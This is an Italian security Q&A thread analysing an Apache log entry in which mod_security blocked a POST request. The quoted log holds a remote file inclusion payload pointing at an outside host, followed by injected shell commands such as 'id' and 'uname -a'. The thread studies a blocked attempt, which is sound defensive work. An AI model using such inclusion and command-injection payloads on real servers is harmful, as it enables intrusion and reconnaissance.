Analisi del registro Wireshark

Naviga le tue risposte
1

Ho il seguente log di Wireshark e voglio classificare l'attacco. Penso che stampa l'utente sotto apache esegue e poi stampa le informazioni di sistema. Da questo registro possiamo determinare se l'attacco ha avuto successo? Secondo me non era a causa del mod-security di apache. 

Request: 200.158.8.207-- [19/Jan/2012:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
POST lindex.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: '/'
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "unamelx20-a" at
POST_PAYLOAD
mod_security-action: 403

65
lid=http://th3.ownz. p5. org. uk/lila.jpg?&cmd=cd /Imp; id; lsuname -a
    
posta glarkou 28.02.2012 - 20:26
fonte

1 risposta

6

mod_security ha inviato all'utente una risposta HTTP 403, il che significa (citato da RFC 2616 ) :

The server understood the request, but is refusing to fulfill it. Authorization will not help and the request SHOULD NOT be repeated. If the request method was not HEAD and the server wishes to make public why the request has not been fulfilled, it SHOULD describe the reason for the refusal in the entity. If the server does not wish to make this information available to the client, the status code 404 (Not Found) can be used instead.

Il motivo di questo blocco corrisponde al pattern "uname -a" che è un comando unix per la restituzione delle informazioni di sistema. Ecco un esempio di output di tale comando:

Linux k4rrax 2.6.35-32-generic #64-Ubuntu SMP Mon Jan 2 23:31:33 UTC 2012 i686 GNU/Linux

Questo "attacco" è probabilmente solo uno scriptkiddie o un bot casuale che prova a vedere se può sfruttarlo in qualche modo. È molto comune su Internet. L'indirizzo IP di origine è già inserito in una lista nera di diversi luoghi: link

    
risposta data 28.02.2012 - 20:38
fonte

Leggi altre domande sui tag

Sicurezza client vs server per applicazioni business critical (multipiattaforma) Misura preventiva per il rilevamento di attacchi di Session Fixation